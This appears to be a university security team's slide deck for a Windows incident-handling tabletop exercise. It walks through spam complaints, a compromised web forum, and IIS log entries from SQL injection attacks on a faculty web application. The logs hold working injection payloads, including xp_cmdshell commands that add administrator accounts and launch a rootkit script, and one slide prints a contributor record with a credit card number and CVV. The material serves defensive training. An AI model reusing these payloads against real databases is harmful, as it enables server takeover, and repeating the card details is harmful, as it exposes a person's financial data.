Windows Incident Handling Table Top Exercise
January 9, 2008
Policies, Policies, Policies
and Procedures
Information Technology Resource Use Policy 6460cEffective Date: Nov. 3, 1997http://www.boisestate.edu/policy/index.asp?section=6&policynum=6460
Information Privacy and Security Policy 6466aEffective Date: Dec. 22, 2006http://www.boisestate.edu/policy/index.asp?section=6&policynum=6466
Incident Response Procedure Effective Date: Dec. 22, 2006 (under review)http://boisestate.edu/oit/iso/IncidentResponseProcedureBSU.html
Incident Response Policy(under review)http://boisestate.edu/oit/iso/incResponsePolicy.html
Data Classification Standard (under review)http://boisestate.edu/oit/iso/DataClassificationStandardBSU.html
Drafts of IT Policy Available for Commenthttp://boisestate.edu/oit/iso
Events or Incidents?
An event is any observable occurrence in a system or network.
An incident can be thought of as a violation or imminent threat of violation of computer security policies, acceptable use policies, or standard security practices.
--NIST Computer Security Incident Handling Guide (sp800-61)
Incident Handling Process
PreparationAlso—prevention
IdentificationWhat has happened/is happening & why
ContainmentKeep the problem from spreading
EradicationRemove the problem
RecoveryReturn the affected server/service to production
Lessons LearnedDiscuss what went well and not so well to do better next time
Adapted from NIST, SANS, ITIL
Medium Size, pretty well funded college in MRUD
Ten Windows servers, Linux and Mac, too
All Windows servers are 2003 latest SP, current on patches, current and up-to-date AVPart of MRUD AD domain
Some Windows servers are fresh installs, Some are upgrades from Win2k
Six IIS servers
Two IIS servers have FP 2003 extensionsOne FP virtual server for each dept and some associate college and dept activities
Two MS-SQL serversOne SQL server is backend for various home grown dept web applications
Innovative, entrepreneurial facultyUse many student employees and "helpers" to set up web sites and web
applications
>>> David Hawley <[email protected]> 3/14/2007 9:01 AM >>>
To Whom It May Concern, I recevied the attached sexual spam from someone at your university. I'm letting you know because I sure you do not want your University to be joined in any lawsuit that may come out of this activity. David Hawley
-----Forwarded Message----- From: [email protected] Sent: Mar 14, 2007 5:54 AM To: Xqzme2 Subject: Greetings !!!
Hello ours dear member!.
Thank you for using our services!Now we represent new unique 2 sites for you.Believe, this site will not leave you cold ! Just exclusive high definition quality video. Only best for you!To your good health and prosperity ! Thanks for attention !
If you love young innocent bodies CLICK HERE.If you love skilled and mature CLICK HERE.
P.S. All our members get free unlimited BONUS ACCESS to many another perfect sites!
not sure what to do with this...
From: Average UserTo: [email protected] Date: 5/10/2007 10:19 AMSubject: Fwd: Illegal content
This email does not look like it came from a reliable source. We did not open the links and are deleting this but I thought it would be good to forward on to OIT.
Thanks,
Average
From: "Uwe Packer" <[email protected]>To: <[email protected]>, <[email protected]>, <[email protected]>Date: 5/9/2007 10:34 PMSubject: Illegal content
Unfortunately I have to report that your IT services are being misused for spamming and drug sales. Would you please upgrade your security and stop this content from being distributed to minors.
Uwe
Sample post received:May 10, 2007 at 05:22:18 propecia ([email protected])http://modlang.boisestate.edu/_s297board/000009a5.htm
Hi! propecia [url=http://modlang.boisestate.edu/_s297board/000009a5.htm]propecia[/url] Welcome!
===
May 10, 2007 at 02:04:31 Tadalafil ([email protected])http://modlang.boisestate.edu/_s297board/000009a4.htm?tadalafil
Hi! tadalafil as [url=http://modlang.boisestate.edu/_s297board/000009a4.htm?tadalafil]tadalafil as[/url] Waiting for you!
_________________________________________________________________Advertisement: 1000s of Sexy Singles online now at Lavalife - Click here http://a.ninemsn.com.au/b.aspx?URL=http%3A%2F%2Flavalife9%2Eninemsn%2Ecom%2Eau%2Fclickthru%2Fclickthru%2Eact%3Fid%3Dninemsn%26context%3Dan99%26locale%3Den%5FAU%26a%3D27782&_t=762255081&_r=lavalife_may07_1000sexysingles&_m=EXT
From: Help DeskTo: User, AverageDate: 5/10/2007 11:02 AMSubject: Re: Fwd: Illegal content
Hi Average,
Yes, this is a spam email. Please delete. In the future you may also forward spam emails as attachments to [email protected]
Thank you,
Techy
From: Simon Brady <[email protected]>To: <[email protected]>Date: 5/13/2007 4:12 AMSubject: Compromised Boise State website
Hi folks,
A web bulletin board run by your Modern Languages and Literatures Faculty appears to have been taken oven by spammers:
http://modlang.boisestate.edu/s297board_frm.htm
Could you please pass this on to your IT security staff?
Thanks,Simon
Site is a web forum that anyone can post to.... no username/ passowrd required.Main site: http://modlang.boisestate.edu/webspanish/s297boardhome.htmThe main modlang site does not even seem to have a link to this forum so I'm not sure how someone would navigate to it... but all the same there are several posts from the last few days that have inappropriate wording.
TuesdayWednesday
ThursdayFriday
0
20
40
60
80
100
120
Noon
6:00 p
6:00 a
> From: "ernie nicholas" <[email protected]>> Date: June 4, 2007 12:17:41 PM MDT> To: [email protected] > Subject: spam page>> Hello,>> The following page links to spam:> http://www.boisestate.edu/malville/maincontent.asp?page=bgdubscr >> thanks
> From: "john smith" <[email protected]>> Date: June 8, 2007 12:17:41 PM MDT> To: [email protected] > Subject: spam page>> Hello,>> The following page links to spam:> http://www.boisestate.edu/malville/maincontent.asp?page=uhlffmhy >> thanks**********************************************> From: "bob carol" <[email protected]>> Date: June 10, 2007 2:27:31 AM MDT> To: [email protected] > Subject: spam page>> Hello,>> The following page links to spam:> http://www.boisestate.edu/malville/maincontent.asp?page=bzvetcps>> thanks***********************************************> From: "ted nalice" <[email protected]>> Date: June 14, 2007 11:12:45 PM MDT> To: [email protected] > Subject: spam page>> Hello,>> The following page links to spam:> http://www.boisestate.edu/malville/maincontent.asp?page=bgdubscr >> thanks
2007-05-18 18:36:44 132.178.236.60 GET /malville/maincontent.asp page=Policies'%3BINSERT+INTO+OTHERPAGES+(PAGE,CONTENT)+VALUES+(CHAR(117)%2BCHAR(104)%2BCHAR(108)%2BCHAR(102)%2BCHAR(102)%2BCHAR(109)%2BCHAR(104)%2BCHAR(121),SPACE(0))%2D%2D 80 - 83.222.16.60 Mozilla/4.0+(compatible;+MSIE+6.0;+Windows+NT+5.1) 200 0 0
This Translates to a SQL insert command loading an entry and a script, “uhlffmhy” in the “OtherPages” table. Then, a URL like this
http://www.boisestate.edu/malville/maincontent.asp?page=uhlffmhy
redirects to an on-line pharmaceutical site.
2007-05-21 09:24:11 132.178.236.60 GET /malville/maincontent.asp page=bzvetcps' and 1=1;declare @cmd varÐset @cmd = start wscript upwroot.vbs //BEXEC MASTER..XP_CMDSHELL @cmd;-- and '1'='1 80 - 202.96.182.225 Mozilla/4.0+(compatible;+MSIE+7.0;+Windows+NT+6.0;+SLCC1;+.NET+CLR+2.0.50727;+.NET+CLR+3.0.04506) 200 0 0
This injection used the Malville database to upload and run a Visual Basic script that installed a rootkit after running 11 previous SQL commands to prepare the database for the script. Symantec Anti-virus did not mark or alert on the trojan programs installed by the rootkit. The rootkit then allowed remote access to the server.
2007-05-26 17:26:12 132.178.236.60 HEAD /malville/maincontent.asp page=bgdubscr%27%3B%44%72%6F%70%20%74%61%62%6C%65%20%63%6F%6D%64%5F%6C%69%73%74%20%3B%43%52%45%41%54%45%20%54%41%42%4C%45%20%63%6F%6D%64%5F%6C%69%73%74%20%28%43%6F%6D%52%65%73%75%6C%74%20%6E%76%61%72%63%68%61%72%28%31%30%30%30%29%29%20%49%4E%53%45%52%54%20%63%6F%6D%64%5F%6C%69%73%74%20%45%58%45%43%20%4D%41%53%54%45%52%2E%2E%78%70%5F%63%6D%64%73%68%65%6C%6C%20%22%6E%65%74%20%75%73%65%72%20%72%6F%79%20%31%32%33%20%2F%61%64%64%22%2D%2D 80 - 221.201.236.13 Mozilla/3.0+(compatible;+Indy+Library) 200 0 0
2007-05-26 17:26:12 132.178.236.60 HEAD /malville/maincontent.asp page=bgdubscr';Drop table comd_list ;CREATE TABLE comd_list (ComResult nvarchar(1000)) INSERT comd_list EXEC MASTER..xp_cmdshell "net user roy 123 /add"-- 80 - 221.201.236.13 Mozilla/3.0+(compatible;+Indy+Library) 200 0
Mix of text and hex sent to the database:
2007-06-02 11:50:54 132.178.236.60 GET /malville/maincontent.asp page=mkvmmjvq';CREATE%20TABLE%20[X_6691]([id]%20int%20NOT%20NULL%20IDENTITY%20(1,1),%20[ResultTxt]%20nvarchar(4000)%20NULL);insert%20into%20[X_6691](ResultTxt)%20exec%20master..xp_cmdshell%20'net%20user%20iisadmin%20admin%20/add';insert%20into%20[X_6691]%20values%20('g_over');exec%20master..sp_dropextendedproc%20'xp_cmdshell'-- 80 - 125.40.210.107 Mozilla/4.0+(compatible;+MSIE+6.0;+Windows+98;+.NET+CLR+1.1.4322) 200 0 64
Translated:
2007-06-02 11:50:54 132.178.236.60 GET /malville/maincontent.asp page=mkvmmjvq';CREATE TABLE [X_6691]([id] int NOT NULL IDENTITY (1,1), [ResultTxt] nvarchar(4000) NULL);insert into [X_6691](ResultTxt) exec master..xp_cmdshell 'net user iisadmin admin /add';insert into [X_6691] values ('g_over');exec master..sp_dropextendedproc 'xp_cmdshell'-- 80 - 125.40.210.107 Mozilla/4.0+(compatible;+MSIE+6.0;+Windows+98;+.NET+CLR+1.1.4322) 200 0 64
How did this happen?
Still, attacker shouldn't have gotten as far as he/she did!
Just a faculty member's pet project.
Tables in the Malville Database:
The usual system tables and:
ChecklistCrossReferencesFeedbackOtherPagesContributors
For display purposes, these rows from the Contributors table are displayed as columns
id 500name Thomas Smithaddress 1492 Columbus Dr.city Hopestate IDzip 83666hphone 2088769821posit Marketing Directorempl Coldwater Creekwphone 2088353009email [email protected] phoneDriveamount 750cc mcccname Thomas L. Smithccnum 4857349832681896ccexp 10/10/2010cvv 430alum yesassn yesgyear 1993degree BSmajor mktFinspouse Mary
OK! You've identified the problem. How do you keep it from getting worse?
How do you remove the pestilence?
How and when do you get the server back in business?
Time to go home!
Thanks!